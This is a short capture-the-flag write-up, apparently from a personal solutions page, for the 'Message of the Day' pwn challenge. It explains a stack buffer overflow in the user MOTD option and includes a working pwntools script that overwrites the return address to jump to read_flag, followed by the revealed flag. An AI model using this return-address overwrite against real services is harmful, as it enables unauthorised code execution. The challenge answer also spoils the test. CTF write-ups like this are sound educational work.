MESSAGE OF THE DAY

pwn

From the OffHub router, you jump onto the Google-Haus smart hub. This fully feature assistant of the future that uses machine learning on the blockchain to control all our IoT devices promises it all. It delivers the ability to print a Message-of-the-day. The rest is available as a premium subscription service paid monthly.

$ nc motd.ctfcompetition.com 1337

cf6c6160966eae95b4313f05ad33b9794d2817b06766a5261d952990ad27a6a6

The binary lets you get and set a user and admin MOTD, but you are not allowed to read the admin MOTD unless you are root. When inspecting the function, it calls a function called read_flag, so we just have to jump there.

Set a new user MOTD with option 2, overflow the buffer and control the RIP to jump to the read_flag function and it prints out the flag.

Exploit script:

from pwn import *


e = ELF('motd')

# p = process('motd')
p = remote('motd.ctfcompetition.com', 1337)

p.recvuntil(': ')
p.sendline('2')
p.recvuntil(': ')
p.sendline('A' * 264 + p64(e.symbols['read_flag']))

print p.recvall()

flag: CTF{m07d_1s_r3t_2_r34d_fl4g}

ctftime

My solutions for various CTF challenges

MESSAGE OF THE DAY

pwn